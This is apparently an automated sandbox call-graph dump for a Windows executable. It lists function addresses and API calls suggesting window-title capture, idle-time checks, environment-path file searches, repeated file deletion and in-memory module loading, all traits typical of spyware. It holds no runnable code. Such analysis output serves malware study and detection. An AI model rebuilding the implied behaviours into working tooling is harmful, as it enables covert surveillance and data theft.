DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53861->54160 53863 404eb3 SetEvent CloseHandle CloseHandle 53863->53859 53864->53829 53865->53832 53867 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53866->53867 53868 401fc9 53866->53868 53867->53850 53871 415b25 53867->53871 53870 4025e0 28 API calls 53868->53870 53870->53867 53872 4020f6 28 API calls 53871->53872 53873 415b47 SetEvent 53872->53873 53874 415b5c 53873->53874 53950 4041a2 53874->53950 53877 4020f6 28 API calls 53878 415b86 53877->53878 53879 4020f6 28 API calls 53878->53879 53880 415b98 53879->53880 53953 41beac 53880->53953 53883 415bc1 GetTickCount 53975 41bc1f 53883->53975 53884 415d20 53948 415d11 53884->53948 53949 415d34 53884->53949 53885 401e8d 11 API calls 53887 4170cd 53885->53887 53890 401fd8 11 API calls 53887->53890 53892 4170d9 53890->53892 53894 401fd8 11 API calls 53892->53894 53893 415bde 53896 41bc1f 28 API calls 53893->53896 53895 4170e5 53894->53895 53897 415be9 53896->53897 53981 41bb27 53897->53981 53902 401e65 22 API calls 53903 415c13 53902->53903 53904 402f31 28 API calls 53903->53904 53905 415c21 53904->53905 53990 402ea1 28 API calls 53905->53990 53907 415c30 53908 402f10 28 API calls 53907->53908 53909 415c3f 53908->53909 53991 402ea1 28 API calls 53909->53991 53911 415c4e 53912 402f10 28 API calls 53911->53912 53913 415c5a 53912->53913 53992 402ea1 28 API calls 53913->53992 53915 415c64 53916 404aa1 61 API calls 53915->53916 53917 415c73 53916->53917 53918 401fd8 11 API calls 53917->53918 53919 415c7c 53918->53919 53920 401fd8 11 API calls 53919->53920 53921 415c88 53920->53921 53922 401fd8 11 API calls 53921->53922 53923 415c94 53922->53923 53924 401fd8 11 API calls 53923->53924 53925 415ca0 53924->53925 53926 401fd8 11 API calls 53925->53926 53927 415cac 53926->53927 53928 401fd8 11 API calls 53927->53928 53929 415cb8 53928->53929 53993 401f09 53929->53993 53932 401fd8 11 API calls 53933 415cca 53932->53933 53934 401fd8 11 API calls 53933->53934 53935 415cd3 53934->53935 53936 401e65 22 API calls 53935->53936 53937 415cde 53936->53937 53996 43bb2c 53937->53996 53940 415cf0 53943 415d09 53940->53943 53944 415cfe 53940->53944 53941 415d16 53942 401e65 22 API calls 53941->53942 53942->53884 54001 404f51 53943->54001 54000 404ff4 82 API calls 53944->54000 53947 415d04 53947->53948 53948->53885 54016 4050e4 84 API calls 53949->54016 54017 40423a 53950->54017 53954 4020df 11 API calls 53953->53954 53974 41bebf 53954->53974 53955 41bf2f 53956 401fd8 11 API calls 53955->53956 53957 41bf61 53956->53957 53959 401fd8 11 API calls 53957->53959 53958 41bf31 53960 4041a2 28 API calls 53958->53960 53962 41bf69 53959->53962 53963 41bf3d 53960->53963 53961 4041a2 28 API calls 53961->53974 53964 401fd8 11 API calls 53962->53964 53965 401fe2 28 API calls 53963->53965 53967 415ba1 53964->53967 53968 41bf46 53965->53968 53966 401fe2 28 API calls 53966->53974 53967->53883 53967->53884 53967->53948 53969 401fd8 11 API calls 53968->53969 53971 41bf4e 53969->53971 53970 401fd8 11 API calls 53970->53974 54024 41cec5 28 API calls 53971->54024 53974->53955 53974->53958 53974->53961 53974->53966 53974->53970 54023 41cec5 28 API calls 53974->54023 54025 441ed1 53975->54025 53978 402093 28 API calls 53979 415bd2 53978->53979 53980 41bb77 GetLastInputInfo GetTickCount 53979->53980 53980->53893 54034 436f10 53981->54034 53986 41bdaf 53987 41bdbc 53986->53987 53988 4020b7 28 API calls 53987->53988 53989 415c05 53988->53989 53989->53902 53990->53907 53991->53911 53992->53915 53994 402252 11 API calls 53993->53994 53995 401f12 53994->53995 53995->53932 53997 43bb45 _strftime 53996->53997 54083 43ae83 53997->54083 53999 415ceb 53999->53940 53999->53941 54000->53947 54002 404f65 54001->54002 54003 404fea 54001->54003 54004 404f6e 54002->54004 54005 404fc0 CreateEventA CreateThread 54002->54005 54006 404f7d GetLocalTime 54002->54006 54003->53948 54004->54005 54005->54003 54154 405150 54005->54154 54007 41bc1f 28 API calls 54006->54007 54008 404f91 54007->54008 54153 4052fd 28 API calls 54008->54153 54016->53947 54018 404243 54017->54018 54019 4023ce 11 API calls 54018->54019 54020 40424e 54019->54020 54021 402569 28 API calls 54020->54021 54022 4041b5 54021->54022 54022->53877 54023->53974 54024->53955 54026 441edd 54025->54026 54029 441ccd 54026->54029 54028 41bc43 54028->53978 54030 441ce4 54029->54030 54032 441d1b pre_c_initialization 54030->54032 54033 44062d 20 API calls _free 54030->54033 54032->54028 54033->54032 54035 41bb46 GetForegroundWindow GetWindowTextW 54034->54035 54036 40417e 54035->54036 54037 404186 54036->54037 54042 402252 54037->54042 54039 404191 54046 4041bc 54039->54046 54043 40225c 54042->54043 54044 4022ac 54042->54044 54043->54044 54050 402779 11 API calls std::_Deallocate 54043->54050 54044->54039 54047 4041c8 54046->54047 54051 4041d9 54047->54051 54049 40419c 54049->53986 54050->54044 54052 4041e9 54051->54052 54053 404206 54052->54053 54054 4041ef 54052->54054 54068 4027e6 54053->54068 54058 404267 54054->54058 54057 404204 54057->54049 54059 402888 22 API calls 54058->54059 54060 40427b 54059->54060 54061 404290 54060->54061 54062 4042a5 54060->54062 54079 4042df 22 API calls 54061->54079 54063 4027e6 28 API calls 54062->54063 54067 4042a3 54063->54067 54065 404299 54080 402c48 22 API calls 54065->54080 54067->54057 54069 4027ef 54068->54069 54070 402851 54069->54070 54071 4027f9 54069->54071 54082 4028a4 22 API calls 54070->54082 54074 402802 54071->54074 54075 402815 54071->54075 54081 402aea 28 API calls __EH_prolog 54074->54081 54077 402813 54075->54077 54078 402252 11 API calls 54075->54078 54077->54057 54078->54077 54079->54065 54080->54067 54081->54077 54099 43ba8a 54083->54099 54085 43aed0 54105 43a837 54085->54105 54086 43ae95 54086->54085 54087 43aeaa 54086->54087 54098 43aeaf pre_c_initialization 54086->54098 54104 44062d 20 API calls _free 54087->54104 54091 43aedc 54092 43af0b 54091->54092 54113 43bacf 40 API calls __Tolower 54091->54113 54095 43af77 54092->54095 54114 43ba36 20 API calls 2 library calls 54092->54114 54115 43ba36 20 API calls 2 library calls 54095->54115 54096 43b03e _strftime 54096->54098 54116 44062d 20 API calls _free 54096->54116 54098->53999 54100 43baa2 54099->54100 54101 43ba8f 54099->54101 54100->54086 54117 44062d 20 API calls _free 54101->54117 54103 43ba94 pre_c_initialization 54103->54086 54104->54098 54106 43a854 54105->54106 54107 43a84a 54105->54107 54106->54107 54118 448295 GetLastError 54106->54118 54107->54091 54109 43a875 54139 4483e4 36 API calls __Getctype 54109->54139 54111 43a88e 54140 448411 36 API calls __cftof 54111->54140 54113->54091 54114->54095 54115->54096 54116->54098 54117->54103 54119 4482b7 54118->54119 54120 4482ab 54118->54120 54142 445b74 20 API calls 3 library calls 54119->54142 54141 44883c 11 API calls 2 library calls 54120->54141 54123 4482b1 54123->54119 54125 448300 SetLastError 54123->54125 54124 4482c3 54126 4482cb 54124->54126 54149 448892 11 API calls 2 library calls 54124->54149 54125->54109 54143 446802 54126->54143 54128 4482e0 54128->54126 54131 4482e7 54128->54131 54130 4482d1 54132 44830c SetLastError 54130->54132 54150 448107 20 API calls _free 54131->54150 54151 446175 36 API calls 4 library calls 54132->54151 54134 4482f2 54136 446802 _free 20 API calls 54134->54136 54138 4482f9 54136->54138 54137 448318 54138->54125 54138->54132 54139->54111 54140->54107 54141->54123 54142->54124 54144 44680d HeapFree 54143->54144 54145 446836 _free 54143->54145 54144->54145 54146 446822 54144->54146 54145->54130 54152 44062d 20 API calls _free 54146->54152 54148 446828 GetLastError 54148->54145 54149->54128 54150->54134 54151->54137 54152->54148 54157 40515c 102 API calls 54154->54157 54156 405159 54157->54156 54158->53856 54159->53861 54160->53863 54161 44839e 54169 448790 54161->54169 54165 4483c7 54166 4483ba 54166->54165 54177 4483ca 11 API calls 54166->54177 54168 4483b2 54170 44854a _free 5 API calls 54169->54170 54171 4487b7 54170->54171 54172 4487cf TlsAlloc 54171->54172 54173 4487c0 54171->54173 54172->54173 54174 43502b _ValidateLocalCookies 5 API calls 54173->54174 54175 4483a8 54174->54175 54175->54168 54176 448319 20 API calls 2 library calls 54175->54176 54176->54166 54177->54168 54178 100020db 54179 100020e7 ___DestructExceptionObject 54178->54179 54180 10002110 dllmain_raw 54179->54180 54181 100020f6 54179->54181 54185 1000210b 54179->54185 54180->54181 54182 1000212a 54180->54182 54191 10001eec 54182->54191 54184 10002177 54184->54181 54186 10001eec 29 API calls 54184->54186 54185->54181 54185->54184 54188 10001eec 29 API calls 54185->54188 54187 1000218a 54186->54187 54187->54181 54189 10002193 dllmain_raw 54187->54189 54190 1000216d dllmain_raw 54188->54190 54189->54181 54190->54184 54192 10001ef7 54191->54192 54193 10001f2a dllmain_crt_process_detach 54191->54193 54194 10001f1c dllmain_crt_process_attach 54192->54194 54195 10001efc 54192->54195 54200 10001f06 54193->54200 54194->54200 54196 10001f12 54195->54196 54197 10001f01 54195->54197 54202 100023ec 27 API calls 54196->54202 54197->54200 54201 1000240b 25 API calls 54197->54201 54200->54185 54201->54200 54202->54200 54203 434918 54204 434924 ___DestructExceptionObject 54203->54204 54230 434627 54204->54230 54206 43492b 54208 434954 54206->54208 54536 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 54206->54536 54217 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54208->54217 54241 4442d2 54208->54241 54212 434973 ___DestructExceptionObject 54213 4349f3 54249 434ba5 54213->54249 54217->54213 54537 443487 36 API calls 4 library calls 54217->54537 54231 434630 54230->54231 54542 434cb6 IsProcessorFeaturePresent 54231->54542 54233 43463c 54543 438fb1 54233->54543 54235 434641 54236 434645 54235->54236 54552 44415f 54235->54552 54236->54206 54239 43465c 54239->54206 54243 4442e9 54241->54243 54242 43502b _ValidateLocalCookies 5 API calls 54244 43496d 54242->54244 54243->54242 54244->54212 54245 444276 54244->54245 54246 4442a5 54245->54246 54247 43502b _ValidateLocalCookies 5 API calls 54246->54247 54248 4442ce 54247->54248 54248->54217 54250 436f10 ___scrt_fastfail 54249->54250 54251 434bb8 GetStartupInfoW 54250->54251 54252 4349f9 54251->54252 54253 444223 54252->54253 54602 44f0d9 54253->54602 54255 44422c 54257 434a02 54255->54257 54606 446895 36 API calls 54255->54606 54258 40ea00 54257->54258 54736 41cbe1 LoadLibraryA GetProcAddress 54258->54736 54260 40ea1c GetModuleFileNameW 54741 40f3fe 54260->54741 54262 40ea38 54263 4020f6 28 API calls 54262->54263 54264 40ea47 54263->54264 54265 4020f6 28 API calls 54264->54265 54266 40ea56 54265->54266 54267 41beac 28 API calls 54266->54267 54268 40ea5f 54267->54268 54756 40fb52 54268->54756 54270 40ea68 54271 401e8d 11 API calls 54270->54271 54272 40ea71 54271->54272 54273 40ea84 54272->54273 54274 40eace 54272->54274 54950 40fbee 118 API calls 54273->54950 54276 401e65 22 API calls 54274->54276 54278 40eade 54276->54278 54277 40ea96 54279 401e65 22 API calls 54277->54279 54281 401e65 22 API calls 54278->54281 54280 40eaa2 54279->54280 54951 410f72 36 API calls __EH_prolog 54280->54951 54282 40eafd 54281->54282 54283 40531e 28 API calls 54282->54283 54285 40eb0c 54283->54285 54287 406383 28 API calls 54285->54287 54286 40eab4 54952 40fb9f 78 API calls 54286->54952 54289 40eb18 54287->54289 54291 401fe2 28 API calls 54289->54291 54290 40eabd 54953 40f3eb 71 API calls 54290->54953 54293 40eb24 54291->54293 54294 401fd8 11 API calls 54293->54294 54295 40eb2d 54294->54295 54297 401fd8 11 API calls 54295->54297 54299 40eb36 54297->54299 54300 401e65 22 API calls 54299->54300 54301 40eb3f 54300->54301 54302 401fc0 28 API calls 54301->54302 54303 40eb4a 54302->54303 54304 401e65 22 API calls 54303->54304 54305 40eb63 54304->54305 54306 401e65 22 API calls 54305->54306 54307 40eb7e 54306->54307 54308 40ebe9 54307->54308 54954 406c59 54307->54954 54309 401e65 22 API calls 54308->54309 54315 40ebf6 54309->54315 54311 40ebab 54312 401fe2 28 API calls 54311->54312 54313 40ebb7 54312->54313 54314 401fd8 11 API calls 54313->54314 54317 40ebc0 54314->54317 54316 40ec3d 54315->54316 54321 413584 3 API calls 54315->54321 54760 40d0a4 54316->54760 54959 413584 RegOpenKeyExA 54317->54959 54327 40ec21 54321->54327 54325 40f38a 55052 4139e4 30 API calls 54325->55052 54327->54316 54962 4139e4 30 API calls 54327->54962 54335 40f3a0 55053 4124b0 65 API calls ___scrt_fastfail 54335->55053 54536->54206 54537->54213 54542->54233 54544 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54543->54544 54556 43a4ba 54544->54556 54547 438fc4 54547->54235 54549 438fcc 54550 438fd7 54549->54550 54570 43a4f6 DeleteCriticalSection 54549->54570 54550->54235 54598 44fbe8 54552->54598 54555 438fda 8 API calls 3 library calls 54555->54236 54557 43a4c3 54556->54557 54559 43a4ec 54557->54559 54561 438fc0 54557->54561 54571 438eff 54557->54571 54576 43a4f6 DeleteCriticalSection 54559->54576 54561->54547 54562 43a46c 54561->54562 54591 438e14 54562->54591 54564 43a476 54565 43a481 54564->54565 54596 438ec2 6 API calls try_get_function 54564->54596 54565->54549 54567 43a48f 54568 43a49c 54567->54568 54597 43a49f 6 API calls ___vcrt_FlsFree 54567->54597 54568->54549 54570->54547 54577 438cf3 54571->54577 54574 438f36 InitializeCriticalSectionAndSpinCount 54575 438f22 54574->54575 54575->54557 54576->54561 54578 438d23 54577->54578 54579 438d27 54577->54579 54578->54579 54581 438d47 54578->54581 54584 438d93 54578->54584 54579->54574 54579->54575 54581->54579 54582 438d53 GetProcAddress 54581->54582 54583 438d63 __crt_fast_encode_pointer 54582->54583 54583->54579 54585 438dbb LoadLibraryExW 54584->54585 54590 438db0 54584->54590 54586 438dd7 GetLastError 54585->54586 54587 438def 54585->54587 54586->54587 54588 438de2 LoadLibraryExW 54586->54588 54589 438e06 FreeLibrary 54587->54589 54587->54590 54588->54587 54589->54590 54590->54578 54592 438cf3 try_get_function 5 API calls 54591->54592 54593 438e2e 54592->54593 54594 438e46 TlsAlloc 54593->54594 54595 438e37 54593->54595 54595->54564 54596->54567 54597->54565 54601 44fc01 54598->54601 54599 43502b _ValidateLocalCookies 5 API calls 54600 43464e 54599->54600 54600->54239 54600->54555 54601->54599 54603 44f0eb 54602->54603 54604 44f0e2 54602->54604 54603->54255 54607 44efd8 54604->54607 54606->54255 54608 448295 pre_c_initialization 36 API calls 54607->54608 54609 44efe5 54608->54609 54627 44f0f7 54609->54627 54611 44efed 54636 44ed6c 54611->54636 54614 44f004 54614->54603 54617 44f047 54620 446802 _free 20 API calls 54617->54620 54620->54614 54621 44f042 54660 44062d 20 API calls _free 54621->54660 54623 44f08b 54623->54617 54661 44ec42 20 API calls 54623->54661 54624 44f05f 54624->54623 54625 446802 _free 20 API calls 54624->54625 54625->54623 54628 44f103 ___DestructExceptionObject 54627->54628 54629 448295 pre_c_initialization 36 API calls 54628->54629 54634 44f10d 54629->54634 54631 44f191 ___DestructExceptionObject 54631->54611 54634->54631 54635 446802 _free 20 API calls 54634->54635 54662 446175 36 API calls 4 library calls 54634->54662 54663 445909 EnterCriticalSection 54634->54663 54664 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 54634->54664 54635->54634 54637 43a837 __cftof 36 API calls 54636->54637 54638 44ed7e 54637->54638 54639 44ed8d GetOEMCP 54638->54639 54640 44ed9f 54638->54640 54642 44edb6 54639->54642 54641 44eda4 GetACP 54640->54641 54640->54642 54641->54642 54642->54614 54643 4461b8 54642->54643 54644 4461f6 54643->54644 54645 4461c6 __Getctype 54643->54645 54666 44062d 20 API calls _free 54644->54666 54645->54644 54646 4461e1 RtlAllocateHeap 54645->54646 54665 443001 7 API calls 2 library calls 54645->54665 54646->54645 54648 4461f4 54646->54648 54648->54617 54650 44f199 54648->54650 54651 44ed6c 38 API calls 54650->54651 54652 44f1b8 54651->54652 54655 44f209 IsValidCodePage 54652->54655 54657 44f1bf 54652->54657 54659 44f22e ___scrt_fastfail 54652->54659 54653 43502b _ValidateLocalCookies 5 API calls 54654 44f03a 54653->54654 54654->54621 54654->54624 54656 44f21b GetCPInfo 54655->54656 54655->54657 54656->54657 54656->54659 54657->54653 54667 44ee44 GetCPInfo 54659->54667 54660->54617 54661->54617 54662->54634 54663->54634 54664->54634 54665->54645 54666->54648 54668 44ef28 54667->54668 54673 44ee7e 54667->54673 54671 43502b _ValidateLocalCookies 5 API calls 54668->54671 54672 44efd4 54671->54672 54672->54657 54677 4511ac 54673->54677 54676 44aee6 _swprintf 41 API calls 54676->54668 54678 43a837 __cftof 36 API calls 54677->54678 54679 4511cc MultiByteToWideChar 54678->54679 54681 4512a2 54679->54681 54682 45120a 54679->54682 54683 43502b _ValidateLocalCookies 5 API calls 54681->54683 54684 4461b8 ___crtLCMapStringA 21 API calls 54682->54684 54688 45122b __alloca_probe_16 ___scrt_fastfail 54682->54688 54685 44eedf 54683->54685 54684->54688 54691 44aee6 54685->54691 54686 45129c 54696 435ecd 20 API calls _free 54686->54696 54688->54686 54689 451270 MultiByteToWideChar 54688->54689 54689->54686 54690 45128c GetStringTypeW 54689->54690 54690->54686 54692 43a837 __cftof 36 API calls 54691->54692 54693 44aef9 54692->54693 54697 44acc9 54693->54697 54696->54681 54698 44ace4 ___crtLCMapStringA 54697->54698 54699 44ad0a MultiByteToWideChar 54698->54699 54700 44ad34 54699->54700 54701 44aebe 54699->54701 54705 4461b8 ___crtLCMapStringA 21 API calls 54700->54705 54707 44ad55 __alloca_probe_16 54700->54707 54702 43502b _ValidateLocalCookies 5 API calls 54701->54702 54703 44aed1 54702->54703 54703->54676 54704 44ad9e MultiByteToWideChar 54706 44adb7 54704->54706 54719 44ae0a 54704->54719 54705->54707 54724 448c33 54706->54724 54707->54704 54707->54719 54711 44ade1 54715 448c33 _strftime 11 API calls 54711->54715 54711->54719 54712 44ae19 54713 4461b8 ___crtLCMapStringA 21 API calls 54712->54713 54718 44ae3a __alloca_probe_16 54712->54718 54713->54718 54714 44aeaf 54732 435ecd 20 API calls _free 54714->54732 54715->54719 54717 448c33 _strftime 11 API calls 54720 44ae8e 54717->54720 54718->54714 54718->54717 54733 435ecd 20 API calls _free 54719->54733 54720->54714 54721 44ae9d WideCharToMultiByte 54720->54721 54721->54714 54722 44aedd 54721->54722 54734 435ecd 20 API calls _free 54722->54734 54725 44854a _free 5 API calls 54724->54725 54726 448c5a 54725->54726 54729 448c63 54726->54729 54735 448cbb 10 API calls 3 library calls 54726->54735 54728 448ca3 LCMapStringW 54728->54729 54730 43502b _ValidateLocalCookies 5 API calls 54729->54730 54731 448cb5 54730->54731 54731->54711 54731->54712 54731->54719 54732->54719 54733->54701 54734->54719 54735->54728 54737 41cc20 LoadLibraryA GetProcAddress 54736->54737 54738 41cc10 GetModuleHandleA GetProcAddress 54736->54738 54739 41cc49 44 API calls 54737->54739 54740 41cc39 LoadLibraryA GetProcAddress 54737->54740 54738->54737 54739->54260 54740->54739 55054 41b539 FindResourceA 54741->55054 54744 43bda0 new 21 API calls 54745 40f428 ctype 54744->54745 54746 4020b7 28 API calls 54745->54746 54747 40f443 54746->54747 54748 401fe2 28 API calls 54747->54748 54749 40f44e 54748->54749 54750 401fd8 11 API calls 54749->54750 54751 40f457 54750->54751 54752 43bda0 new 21 API calls 54751->54752 54753 40f468 ctype 54752->54753 55057 406e13 54753->55057 54755 40f49b 54755->54262 54757 40fb5e 54756->54757 54759 40fb65 54756->54759 55060 402163 11 API calls 54757->55060 54759->54270 55061 401fab 54760->55061 54950->54277 54951->54286 54952->54290 54955 4020df 11 API calls 54954->54955 54956 406c65 54955->54956 54957 4032a0 28 API calls 54956->54957 54958 406c82 54957->54958 54958->54311 54960 40ebdf 54959->54960 54961 4135ae RegQueryValueExA RegCloseKey 54959->54961 54960->54308 54960->54325 54961->54960 54962->54316 55052->54335 55055 41b556 LoadResource LockResource SizeofResource 55054->55055 55056 40f419 55054->55056 55055->55056 55056->54744 55058 4020b7 28 API calls 55057->55058 55059 406e27 55058->55059 55059->54755 55060->54759 55566 4129da 55567 4129ec 55566->55567 55568 4041a2 28 API calls 55567->55568 55569 4129ff 55568->55569 55570 4020f6 28 API calls 55569->55570 55571 412a0e 55570->55571 55572 4020f6 28 API calls 55571->55572 55573 412a1d 55572->55573 55574 41beac 28 API calls 55573->55574 55575 412a26 55574->55575 55576 412ace 55575->55576 55578 401e65 22 API calls 55575->55578 55577 401e8d 11 API calls 55576->55577 55579 412ad7 55577->55579 55580 412a3d 55578->55580 55581 401fd8 11 API calls 55579->55581 55582 4020f6 28 API calls 55580->55582 55583 412ae0 55581->55583 55584 412a48 55582->55584 55585 401fd8 11 API calls 55583->55585 55586 401e65 22 API calls 55584->55586 55587 412ae8 55585->55587 55588 412a53 55586->55588 55589 4020f6 28 API calls 55588->55589 55590 412a5e 55589->55590 55591 401e65 22 API calls 55590->55591 55592 412a69 55591->55592 55593 4020f6 28 API calls 55592->55593 55594 412a74 55593->55594 55595 401e65 22 API calls 55594->55595 55596 412a7f 55595->55596 55597 4020f6 28 API calls 55596->55597 55598 412a8a 55597->55598 55599 401e65 22 API calls 55598->55599 55600 412a95 55599->55600 55601 4020f6 28 API calls 55600->55601 55602 412aa0 55601->55602 55603 401e65 22 API calls 55602->55603 55604 412aae 55603->55604 55605 4020f6 28 API calls 55604->55605 55606 412ab9 55605->55606 55610 412aef GetModuleFileNameW 55606->55610 55609 404e26 99 API calls 55609->55576 55611 4020df 11 API calls 55610->55611 55612 412b1a 55611->55612 55613 4020df 11 API calls 55612->55613 55614 412b26 55613->55614 55615 4020df 11 API calls 55614->55615 55638 412b32 55615->55638 55616 40da23 32 API calls 55616->55638 55617 401fd8 11 API calls 55617->55638 55618 41ba09 43 API calls 55618->55638 55619 4185a3 31 API calls 55619->55638 55620 412c58 Sleep 55620->55638 55621 40417e 28 API calls 55621->55638 55622 4042fc 84 API calls 55622->55638 55623 40431d 28 API calls 55623->55638 55624 401f09 11 API calls 55624->55638 55625 412cfa Sleep 55625->55638 55626 403014 28 API calls 55626->55638 55627 412d9c Sleep 55627->55638 55628 41c516 32 API calls 55628->55638 55629 412dff DeleteFileW 55629->55638 55630 412e36 DeleteFileW 55630->55638 55631 412e61 55633 412e72 DeleteFileW 55631->55633 55631->55638 55646 401f09 11 API calls 55631->55646 55649 412eff 55631->55649 55632 412e88 Sleep 55632->55638 55633->55638 55634 412f01 55635 401f09 11 API calls 55634->55635 55636 412f0d 55635->55636 55637 401f09 11 API calls 55636->55637 55639 412f19 55637->55639 55638->55616 55638->55617 55638->55618 55638->55619 55638->55620 55638->55621 55638->55622 55638->55623 55638->55624 55638->55625 55638->55626 55638->55627 55638->55628 55638->55629 55638->55630 55638->55631 55638->55632 55638->55634 55642 412ecd Sleep 55638->55642 55640 401f09 11 API calls 55639->55640 55641 412f25 55640->55641 55643 40b93f 28 API calls 55641->55643 55644 401f09 11 API calls 55642->55644 55645 412f38 55643->55645 55644->55631 55647 4020f6 28 API calls 55645->55647 55646->55631 55648 412f58 55647->55648 55757 413268 55648->55757 55649->55641 55652 401f09 11 API calls 55653 412f6f 55652->55653 55654 4130e3 55653->55654 55655 412f8f 55653->55655 55656 41bdaf 28 API calls 55654->55656 55657 41bdaf 28 API calls 55655->55657 55658 4130ec 55656->55658 55659 412f9b 55657->55659 55660 402f31 28 API calls 55658->55660 55661 41bc1f 28 API calls 55659->55661 55662 413123 55660->55662 55663 412fb5 55661->55663 55664 402f10 28 API calls 55662->55664 55665 402f31 28 API calls 55663->55665 55666 413132 55664->55666 55667 412fe5 55665->55667 55668 402f10 28 API calls 55666->55668 55669 402f10 28 API calls 55667->55669 55670 41313e 55668->55670 55671 412ff4 55669->55671 55672 402f10 28 API calls 55670->55672 55673 402f10 28 API calls 55671->55673 55674 41314d 55672->55674 55675 413003 55673->55675 55676 402f10 28 API calls 55674->55676 55677 402f10 28 API calls 55675->55677 55679 41315c 55676->55679 55678 413012 55677->55678 55681 402f10 28 API calls 55678->55681 55680 402f10 28 API calls 55679->55680 55682 41316b 55680->55682 55683 413021 55681->55683 55684 402f10 28 API calls 55682->55684 55685 402f10 28 API calls 55683->55685 55686 41317a 55684->55686 55687 41302d 55685->55687 55771 402ea1 28 API calls 55686->55771 55689 402f10 28 API calls 55687->55689 55691 413039 55689->55691 55690 413184 55692 404aa1 61 API calls 55690->55692 55769 402ea1 28 API calls 55691->55769 55694 413191 55692->55694 55696 401fd8 11 API calls 55694->55696 55695 413048 55697 402f10 28 API calls 55695->55697 55698 41319d 55696->55698 55699 413054 55697->55699 55700 401fd8 11 API calls 55698->55700 55770 402ea1 28 API calls 55699->55770 55702 4131a9 55700->55702 55704 401fd8 11 API calls 55702->55704 55703 41305e 55705 404aa1 61 API calls 55703->55705 55706 4131b5 55704->55706 55707 41306b 55705->55707 55708 401fd8 11 API calls 55706->55708 55709 401fd8 11 API calls 55707->55709 55711 4131c1 55708->55711 55710 413074 55709->55710 55713 401fd8 11 API calls 55710->55713 55712 401fd8 11 API calls 55711->55712 55714 4131ca 55712->55714 55715 41307d 55713->55715 55716 401fd8 11 API calls 55714->55716 55717 401fd8 11 API calls 55715->55717 55718 4131d3 55716->55718 55719 413086 55717->55719 55720 401fd8 11 API calls 55718->55720 55721 401fd8 11 API calls 55719->55721 55722 4130d7 55720->55722 55723 41308f 55721->55723 55725 401fd8 11 API calls 55722->55725 55724 401fd8 11 API calls 55723->55724 55726 41309b 55724->55726 55727 4131e5 55725->55727 55728 401fd8 11 API calls 55726->55728 55729 401f09 11 API calls 55727->55729 55730 4130a7 55728->55730 55731 4131f1 55729->55731 55732 401fd8 11 API calls 55730->55732 55733 401fd8 11 API calls 55731->55733 55734 4130b3 55732->55734 55735 4131fd 55733->55735 55736 401fd8 11 API calls 55734->55736 55737 401fd8 11 API calls 55735->55737 55738 4130bf 55736->55738 55739 413209 55737->55739 55740 401fd8 11 API calls 55738->55740 55742 401fd8 11 API calls 55739->55742 55741 4130cb 55740->55741 55744 401fd8 11 API calls 55741->55744 55743 413215 55742->55743 55745 401fd8 11 API calls 55743->55745 55744->55722 55746 413221 55745->55746 55747 401fd8 11 API calls 55746->55747 55748 41322d 55747->55748 55749 401fd8 11 API calls 55748->55749 55750 413239 55749->55750 55751 401fd8 11 API calls 55750->55751 55752 413245 55751->55752 55753 401fd8 11 API calls 55752->55753 55754 413251 55753->55754 55755 401fd8 11 API calls 55754->55755 55756 412abe 55755->55756 55756->55609 55759 413277 55757->55759 55767 4132a6 55757->55767 55758 4132b5 55760 40417e 28 API calls 55758->55760 55776 411d2d 55759->55776 55762 4132c1 55760->55762 55763 401fd8 11 API calls 55762->55763 55765 412f63 55763->55765 55765->55652 55767->55758 55772 10001c5b 55767->55772 55769->55695 55770->55703 55771->55690 55773 10001c6b ___scrt_fastfail 55772->55773 55780 100012ee 55773->55780 55775 10001c87 55775->55758 55822 411d39 55776->55822 55779 411fa2 22 API calls new 55779->55767 55781 10001324 ___scrt_fastfail 55780->55781 55782 100013b7 GetEnvironmentVariableW 55781->55782 55806 100010f1 55782->55806 55785 100010f1 51 API calls 55786 10001465 55785->55786 55787 100010f1 51 API calls 55786->55787 55788 10001479 55787->55788 55789 100010f1 51 API calls 55788->55789 55790 1000148d 55789->55790 55791 100010f1 51 API calls 55790->55791 55792 100014a1 55791->55792 55793 100010f1 51 API calls 55792->55793 55794 100014b5 lstrlenW 55793->55794 55795 100014d2 55794->55795 55796 100014d9 lstrlenW 55794->55796 55795->55775 55797 100010f1 51 API calls 55796->55797 55798 10001501 lstrlenW lstrcatW 55797->55798 55799 100010f1 51 API calls 55798->55799 55800 10001539 lstrlenW lstrcatW 55799->55800 55801 100010f1 51 API calls 55800->55801 55802 1000156b lstrlenW lstrcatW 55801->55802 55803 100010f1 51 API calls 55802->55803 55804 1000159d lstrlenW lstrcatW 55803->55804 55805 100010f1 51 API calls 55804->55805 55805->55795 55807 10001118 ___scrt_fastfail 55806->55807 55808 10001129 lstrlenW 55807->55808 55819 10002c40 55808->55819 55810 10001148 lstrcatW lstrlenW 55811 10001177 lstrlenW FindFirstFileW 55810->55811 55812 10001168 lstrlenW 55810->55812 55813 100011a0 55811->55813 55814 100011e1 55811->55814 55812->55811 55815 100011c7 FindNextFileW 55813->55815 55816 100011aa 55813->55816 55814->55785 55815->55813 55818 100011da FindClose 55815->55818 55816->55815 55821 10001000 51 API calls ___scrt_fastfail 55816->55821 55818->55814 55820 10002c57 55819->55820 55820->55810 55820->55820 55821->55816 55857 4117d7 55822->55857 55824 411d57 55825 411d6d SetLastError 55824->55825 55826 4117d7 SetLastError 55824->55826 55853 411d35 55824->55853 55825->55853 55827 411d8a 55826->55827 55827->55825 55829 411dac GetNativeSystemInfo 55827->55829 55827->55853 55830 411df2 55829->55830 55841 411dff SetLastError 55830->55841 55860 411cde VirtualAlloc 55830->55860 55833 411e22 55834 411e47 GetProcessHeap HeapAlloc 55833->55834 55886 411cde VirtualAlloc 55833->55886 55835 411e70 55834->55835 55836 411e5e 55834->55836 55839 4117d7 SetLastError 55835->55839 55887 411cf5 VirtualFree 55836->55887 55842 411eb9 55839->55842 55840 411e3a 55840->55834 55840->55841 55841->55853 55843 411f6b 55842->55843 55861 411cde VirtualAlloc 55842->55861 55888 4120b2 GetProcessHeap HeapFree 55843->55888 55846 411ed2 ctype 55862 4117ea 55846->55862 55848 411efe 55848->55843 55866 411b9a 55848->55866 55852 411f36 55852->55843 55852->55853 55882 1000220c 55852->55882 55853->55779 55854 411f5c 55854->55853 55855 411f60 SetLastError 55854->55855 55855->55843 55858 4117e6 